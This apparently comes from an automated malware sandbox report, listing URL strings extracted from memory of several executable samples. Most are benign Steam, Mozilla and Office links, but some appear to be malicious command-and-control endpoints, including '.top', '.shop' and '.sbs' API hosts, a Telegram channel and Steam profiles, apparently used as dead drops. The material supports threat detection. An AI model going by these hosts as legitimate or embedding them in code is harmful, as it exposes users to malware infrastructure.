Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascrip
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625969981.0000000001125000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=gOyfgA0bHRkL&am
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625969981.0000000001125000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001228000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 8a7032211b.exe, 0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2992760742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3003866879.0000000001120000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2887258181.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.comP
Source: Appeal.com, 00000014.00000002.3672354873.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2737359960.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2801001336.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Appeal.com, 00000014.00000002.3672354873.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2737359960.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2801001336.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 2328527160.exe, 00000018.00000002.2691594206.0000000001628000.00000004.00000020.00020000.00000000.sdmp, 2328527160.exe, 00000018.00000002.2690470302.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativeoutlookstop.top/
Source: 2328527160.exe, 00000018.00000002.2691594206.0000000001628000.00000004.00000020.00020000.00000000.sdmp, 2328527160.exe, 00000018.00000002.2690470302.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativeoutlookstop.top/api
Source: 2328527160.exe, 00000018.00000002.2691594206.0000000001628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativeoutlookstop.top:443/api
Source: c3d996d758.exe, 00000007.00000000.2139467995.00000000005B4000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflictinvalid
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D84000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2679423027.0000000005718000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2669296954.000000000571B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671334503.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671496757.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738624518.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738082890.0000000005D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D84000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2679423027.0000000005718000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2669296954.000000000571B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671334503.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671496757.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738624518.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738082890.0000000005D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D84000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2679423027.0000000005718000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2669296954.000000000571B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671334503.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671496757.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738624518.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738082890.0000000005D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Appeal.com, 00000014.00000002.3602824876.0000000001C19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fizzysu.sbs
Source: Appeal.com, 00000014.00000002.3595548250.0000000001B23000.00000004.00000020.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3602824876.0000000001C19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fizzysu.sbs/
Source: Appeal.com, 00000014.00000002.3602824876.0000000001C19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fizzysu.sbs/ina
Source: Appeal.com, 00000014.00000002.3602824876.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fizzysu.sbsC
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 714ab8b5fd.exe, 00000021.00000003.2801001336.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nearycrepso.shop:443/api
Source: 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625940525.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dniz
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 8a7032211b.exe, 0000001D.00000003.2685369112.0000000005773000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2672283725.0000000004D55000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2739159604.0000000005D61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: 714ab8b5fd.exe, 00000021.00000003.2796948258.0000000005E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 714ab8b5fd.exe, 00000021.00000003.2796948258.0000000005E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Appeal.com, 00000014.00000002.3672354873.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2708834453.0000000005727000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2709358774.0000000005727000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2689656644.0000000005727000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2685369112.0000000005773000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2672766329.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2699918815.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2679806573.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2700330634.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2672283725.0000000004D53000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2762407522.0000000005D58000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2739348873.0000000005D58000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2739159604.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2762083027.0000000005D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Appeal.com, 00000014.00000002.3672354873.0000000004DAE000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2689656644.0000000005702000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2672766329.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2739348873.0000000005D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Appeal.com, 00000014.00000002.3672354873.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2708834453.0000000005727000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2709358774.0000000005727000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2689656644.0000000005727000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2685369112.0000000005773000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2672766329.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2699918815.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2679806573.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2700330634.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2672283725.0000000004D53000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2762407522.0000000005D58000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2739348873.0000000005D58000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2739159604.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2762083027.0000000005D58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Appeal.com, 00000014.00000002.3672354873.0000000004DAE000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2689656644.0000000005702000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2672766329.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2739348873.0000000005D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Appeal.com, 00000014.00000002.3595548250.0000000001B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Appeal.com, 00000014.00000003.2709531843.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2706766000.0000000004D39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sc1
